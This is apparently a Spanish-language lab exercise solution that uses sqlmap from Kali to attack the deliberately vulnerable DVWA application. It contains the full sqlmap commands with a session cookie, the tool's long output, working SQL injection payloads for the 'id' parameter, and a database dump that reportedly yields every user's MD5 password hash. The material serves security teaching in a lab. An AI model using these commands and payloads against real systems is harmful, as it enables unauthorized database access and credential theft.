Beruflich Dokumente
Kultur Dokumente
Actividades
Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).
Tendrás que:
Solución
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.0.1.102/dvwa_last/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: 10.0.1.102
En el que se verifica que los parámetros enviados son: id y Submit, como se había visto
en el código fuente, y anotamos el campo Cookie para pasárselo a sqlmap.
Con estos datos, se lanza sqlmap en la máquina Kali:
root@pc1:~# sqlmap -u
'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=3&Submit=Submit' --
cookie='security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' ___
__H__
___ ___[(]_____ ___ ___ {1.1.6#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program
[19:34:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (UPDATEXML)'
[19:34:52] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[19:34:52] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:34:52] [INFO] testing 'MySQL inline queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:34:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:34:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:34:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:34:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:35:03] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind'
injectable
[19:35:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:35:03] [INFO] automatically extending ranges for UNION query injection technique tests
as there is at least one other (potential) technique found
[19:35:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range for
current UNION query injection technique test
[19:35:04] [INFO] target URL appears to have 2 columns in query
[19:35:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns'
injectable
[19:35:04] [WARNING] in OR boolean-based injection cases, please consider usage of switch
'--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 3731 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=3' OR NOT 1788=1788#&Submit=Submit
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT
(ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813
UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit
Por tanto:
El parámetro id SÍ es vulnerable.
El parámetro Submit NO es vulnerable.
Además, ejecuto la línea anterior, añadiendo la opción –f, para además obtener la versión
exacta de MySQL, que es la 5.0.51, que nos permite buscar exploits (se encuentran
bastantes de DOS en exploit-db).
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=3' AND ROW(3249,6385)>(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT
(ELT(3249=3249,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM (SELECT 5836 UNION SELECT 8813
UNION SELECT 6164 UNION SELECT 3189)a GROUP BY x)-- hzfs&Submit=Submit
Por tanto, las bases de datos disponibles son dvwa, information_schema, metasploit,
mysql, owasp10, tikiwiki y tikiwiki195.
De modo que las tablas de la base de datos dvwa son guestbook y users.
root@pc1:~# sqlmap -u
'http://10.0.1.102/dvwa_last/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie
'security=low; PHPSESSID=b43bcfa6e47421c8f85f371d1677cdcc' --dbms=mysql -D dvwa --dump
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
Con lo que se obtiene el contenido de las tablas users y guestbook (resaltado en amarillo
en la captura anterior), así como las contraseñas (calculadas con md5), de todos los
usuarios.